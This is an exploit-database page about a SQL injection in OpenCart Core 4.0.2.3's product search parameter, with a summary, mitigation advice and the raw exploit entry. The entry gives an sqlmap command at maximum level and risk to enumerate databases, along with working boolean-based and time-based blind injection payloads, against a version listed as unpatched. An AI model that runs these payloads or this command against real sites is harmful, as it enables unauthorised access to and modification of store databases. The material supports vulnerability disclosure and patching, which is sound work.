header-logo
Suggest Exploit
vendor:
OpenCart Core
by:
Saud Alenazi
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: OpenCart Core
Affected Version From: 4.0.2.3
Affected Version To: 4.0.2.3
Patch Exists: NO
Related CWE:
CPE: a:opencart:opencart:4.0.2.3
Metasploit:
Other Scripts:
Platforms Tested: XAMPP, Linux
2024

OpenCart Core 4.0.2.3 – ‘search’ SQL Injection

OpenCart Core 4.0.2.3 is vulnerable to SQL Injection through the 'search' parameter in the URL /index.php?route=product/search&search=. Exploiting this vulnerability can lead to a potential compromise of the application, unauthorized access or modification of data, and exploitation of hidden database vulnerabilities.

Mitigation:

To mitigate this vulnerability, input validation and sanitization should be implemented to filter out malicious SQL queries. Additionally, using parameterized queries can help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart/releases
# Version: 4.0.2.3
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz
* Description :
Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=product/search&search=test
- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
===========
Output :
Parameter: search (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/search&search=') AND 2427=2427-- drCa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

Navigation

Suggest Exploit

Services By CQR